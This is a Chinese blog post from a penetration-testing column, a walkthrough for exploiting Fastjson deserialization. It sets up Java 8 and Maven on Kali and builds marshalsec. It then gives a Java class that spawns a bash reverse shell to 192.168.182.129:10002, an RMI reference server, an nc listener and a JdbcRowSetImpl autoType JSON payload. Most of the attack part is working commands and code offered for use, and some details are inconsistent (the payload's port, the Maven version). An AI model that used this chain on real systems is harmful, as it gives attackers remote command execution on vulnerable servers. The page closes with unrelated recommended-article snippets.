java版本共存与fastjson反序列化rmi服务器的搭建

最新推荐文章于 2024-07-10 21:37:49 发布
最新推荐文章于 2024-07-10 21:37:49 发布
阅读量897 收藏 9
点赞数 18
分类专栏: 渗透 文章标签: fastjson 反序列化 rmi 漏洞 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/138340125
版权

文章目录

java 8下载

链接:https://pan.baidu.com/s/1B8U9v8QAe4Vc67Q84_nqcg?pwd=0000
提取码:0000

远程加载类工具

https://github.com/mbechler/marshalsec.git

编译工具mvn

链接:https://pan.baidu.com/s/1Sqo_YkcBIK7mBiY-1ZoRYw?pwd=0000
提取码:0000

多版本共存

启动kail 将java8解压至/usr/local/java中方便管理

mkdir /usr/local/java
tar -zxvf dk-8u202-linux-x64.tar.gz -C  /usr/local/java

这里的参数意义如下:

-z 表示使用gzip进行解压缩。
-x 表示执行解压操作。
-v 代表在解压过程中显示详细的信息,可以看到正在解压的文件名。
-f 后面跟上需要解压的文件名,这里就是你的.tar.gz文件。
-C 解压到指定路径

改个名字

cd /usr/local/java
mv jdk1.8.0_202 jdk1.8.0

解压好进行配置
在文件/etc/profile尾部添加变量
vim /etc/profile
点键盘i键进行编辑

export JAVA_HOME=/usr/local/java/jdk1.8.0

export CLASSPATH=.:$JAVA_HOME/jre/lib/rt.jar:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar

export PATH=.:$ZOOKEEPER_HOME/bin:$JAVA_HOME/bin:$PATH

添加完成后点esc键输入wq进行保存

使用使配置文件生效

source /etc/profile

生效之后使用命令完成jdk版本共存

sudo update-alternatives --install /usr/bin/java java /usr/local/java/jdk1.8.0/bin/java 1500

使用来切换版本

sudo update-alternatives --config java

在这里插入图片描述
这样就成功了
在这里插入图片描述

配置mvn

默认的Linux是没有编译命令的我们需要自己搭建
将Apache Maven解压到/opt目录下
/opt目录主要用于存放第三方应用程序或者非系统自带的软件包

tar -zxvf apache-maven-3.9.6-bin.tar.gz -C /opt

解压完成后进行配置系统变量编辑 /etc/profile

vim /etc/profile

输入i将变量添加到末尾

export M2_HOME=/opt/apache-maven-3.6.3
export PATH=$PATH:$M2_HOME/bin

esc 输入wq保存
使用命令生效配置文件

source /etc/profile

检查是否安装完成

mvn -version

但是我改了之后不可以用不知道为什么

编译marshalsec

cd 到marshalsec文件夹进行编译

mvn clean package -DskipTests

在这里插入图片描述
他会哗哗哗下一堆东西
在这里插入图片描述
这样就说明编译好了看一眼我们的jar包就打好了
在这里插入图片描述

编译rce文件

返回主目录新建一个文件夹为fastjson_payload的文件夹

mkdir fastjson_payload

完成后创建java文件

vim rce.java

进行编辑下面代码,记得修改bash shell的ip及nc开放的端口

import java.lang.Runtime;
import java.lang.Process;
 
public class Rce {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.182.129/10002 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

创建好后进行编译

javac Rce.java

如果提示没有javac进行一下命令安装重新编译

apt install default-jdk

利用marshalsec加载远程RCE类

编译完成后
在此页面开启一个网页服务

python -m http.server  8082

测试一下能否正常访问
在这里插入图片描述
可以看到能够正常访问到我们的class文件
好了接下来回到我们的marshalsec文件夹开启我们的rmi服务

cd github/marshalsec-rmi
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.182.129:8082/#Rce" 10003

意思就是开放一个marshalsec监听端口10003包含的远程加载类为我们刚刚那个文件夹下的class文件
在这里插入图片描述
新建窗口开启nc监听

nc -lvvp 10002

完成之后根据对方的fastjson版本构造payload
例:

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.182.129:8082/Rce","autoCommit":true}}

将payload上传至数据包即可反弹shell

抠脚大汉在网络
关注
  • 18
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan一个简单的Fastjson反序列化检测burp插件我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说...
Java对象的序列化与反序列化Java开发Java经验技巧
11-22
Java对象的序列化与反序列化Java编程中一项重要的技术,它允许我们将Java对象转换为字节流,便于存储、传输或者在网络间传递。这一过程对于数据持久化、跨进程通信(如RMI,Remote Method Invocation)以及分布式...
Java后台面试相关知识点解析
Gabriel的博客
03-07 1091
SpringBoot里面默认使用动态代理配置在。
java代码审计----win10安装docker
赵花花08042的博客
08-09 542
开始看《java代码审计》 第一先安装jdk 安装docker win10安装docker docker官网下载desktop 安装后,docker启动不起来,小鲸鱼图标也是红的 搜索,说打开hyper啥的 控制面板----程序----启用或关闭windows功能 没找到这玩意 查看了一下,适用于linux的windows子系统已经打开了。也不见好 ↓这个博主说是wsl版本老了,下载了安装包果然可行 https://blog.csdn.net/qq_39611230/article/details/1
Java代码审计」华夏ERP3.0代码审计
橙留香Park的博客
09-22 3434
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ..
Java常见面试题 Java面试必看 (一)
boyin333的博客
05-26 3331
本篇博客是本人收集网上Java相关的资料整理所得,仅供参考。 一、Java基础 1、JDK 和 JRE区别 JDK(Java Development Kit)是针对Java开发员的产品,是整个Java的核心,包括了Java运行环境JRE、Java工具和Java基础类库。Java Runtime Environment(JRE)是运行JAVA程序所必须的环境的集合,包...
【学习笔记】Java工程师成神之路-基础篇
lbh_paopao的博客
12-12 2056
免责声明 版权声明 本着互联网的开放精神,本项目采用开放的[GPL]协议进行许可,转载请保留本声明及作者信息,禁止用于任何商业用途 关于作者 Hollis ,阿里巴巴技术专家,51CTO 专栏作家,CSDN 博客专家,掘金优秀作者,《程序员的三门课》联合作者,《Java 工程师成神之路》系列文章作者;热衷于分享计算机编程相关技术,博文全网阅读量数千万 基础篇 面向对象 面向对象与面向过程 什么是面向过程 概述: 自顶而下的编程模式 详解:把问题分解成一个一个步骤,每个步骤用函数实现,依次
SpringCloud Alibaba 学习圣经,10万字实现 SpringCloud 自由
热门推荐
架构师尼恩
03-15 2万+
本PDF是《SpringCloud Alibaba 微服务 学习圣经 》完整版PDF的 V1版本,40岁老架构师尼恩的掏心窝: 通过一系列的学习圣经,带大家穿透“左手云原生+右手大数据 +SpringCloud Alibaba 微服务“ ,实现技术 自由 ,走向颠覆人生,让大家不迷路。
Java基础面试汇总
清欢
06-02 730
概述 ★★★★★"=="和equals方法有什么区别? == 它的作用是判断两个对象的地址是不是相等。即,判断两个对象是不是同一个对象。(基本数据类型比较的是值,引用数据类型比较的是内存地址) equals() : 它的作用也是判断两个对象是否相等。但它一般有两种使用情况: 情况1:类没有覆盖 equals() 方法。则通过 equals() 比较该类的两个对象时,等价于通过“==”比较这两个对象...
《深入理解Dubbo原理与实践》读书笔记
Bballchen的博客
08-02 334
目录 第1章 Dubbo-高性能RPC通信框架 第2章 开发第一款Dubbo应用程序 第4章 Dubbo扩展点加载机制 第5章 Dubbo启停原理解析 第6章 Dubbo远程调用 第7章 Dubbo集群容错 第8章 Dubbo扩展点 第9章 Dubbo高级特性 第10章 Dubbo过滤器 第11章 Dubbo注册中心扩展实践 第13章 Dubbo未来展望 第1章 Dubbo-高性能RPC通信框架 1.1 应用架构演进过程:EJB单体 --> 垂直化服务( MVC )--&gt
面试集锦200道
BUG指挥课堂
04-30 887
一、java基础 1.JDK 和 JRE 有什么区别? JDK是java开发工具包,是程序员使用java语言编写java程序所需的开发工具包,是提供给程序员使用的。JDK包含了JRE;JRE是java运行时环境,包含了java虚拟机,java基础类库。 2.==和 equals 的区别是什么? ==”在进行数据比较时, 如果数据是基本数据类型,比较的是数据的值;如果数据是引用类型,“...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
FastJson反序列化
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的反序列化方法,通过两个bean,进行封装
配置Java开发环境
最新发布
Broken_x的博客
07-10 664
Java开发环境配置
关于static定义初始化块和静态变量以及初始化块的执行顺序问题
你我约定有三的博客
07-08 249
第二步:在类加载的时候,按照从上到下执行static修饰的代码,此时执行static Test2 test1 = new Test2(),也就是创建出一个名为test1的对象。第六步:此时除了main方法,所有由static修饰的代码全部执行完毕(static修饰的代码只执行一次),类初始化完成,开始执行main方法,main方法中只有一条语句(中的代码,此时输出aa以及a的值(由于第一步没赋初值,并且给了默认值为0 所以输出0)//首先输出a的值为10 然后输出bb,最后将a的值定义为11。
java Object 转 Integer
servepeople的博客
07-09 1145
Java 中,可以通过多种方法将一个Object转换为Integer。
java占位符替换五种方式
weixin_61478518的博客
07-08 306
在业务开发中,经常需要输出文本串。其中,部分场景下大部分文本内容是一样的,只有少部分点是不一样。简单做法是直接拼接字段,但是这会有个问题。后面如果想要修改内容,那么每个地方都要修改,这不符合设计模式中的开闭原则,面向应该对扩展开放,对修改关闭。如何解决这个问题?先来看现实生活中的例子,个人信息填写。一般会要填写表格,已经定义好了姓名,性别,年龄等字段,只要填写对应的个人信息就好了。在程序开发中,我们会预先定义好一个字符串模板,需要改动的点使用占位符。
java fastjson反序列化
07-27
Java中的Fastjson库提供了一种方便的方式来进行JSON序列化和反序列化操作。要使用Fastjson进行反序列化,你需要按照以下步骤进行操作: 1. 首先,确保你已经将Fastjson库添加到你的项目中。你可以通过Maven或者手动下载并导入jar文件来添加依赖。 2. 创建一个Java类,该类的结构应该与你要反序列化的JSON数据的结构相匹配。 3. 导入Fastjson的相关类,包括JSON和JSONObject。 4. 使用JSON类的parseObject()方法将JSON字符串转换为JSONObject对象。 5. 使用JSONObject对象的toJavaObject()方法将JSONObject转换为你定义的Java类对象。 下面是一个简单的示例代码,演示了如何使用Fastjson进行反序列化: ```java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Main { public static void main(String[] args) { // JSON数据 String jsonString = "{\"name\":\"John\",\"age\":30}"; // 将JSON字符串转换为JSONObject对象 JSONObject jsonObject = JSON.parseObject(jsonString); // 将JSONObject对象转换为Java对象 Person person = jsonObject.toJavaObject(Person.class); // 打印Java对象的属性值 System.out.println("Name: " + person.getName()); System.out.println("Age: " + person.getAge()); } } class Person { private String name; private int age; // 省略getter和setter方法 public String getName() { return name; } public void setName(String name) { this.name = name; } public int getAge() { return age; } public void setAge(int age) { this.age = age; } } ``` 在上面的示例中,我们首先将JSON字符串转换为JSONObject对象,然后将JSONObject对象转换为Person类的实例。最后,我们可以通过调用Person对象的getter方法来获取属性值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值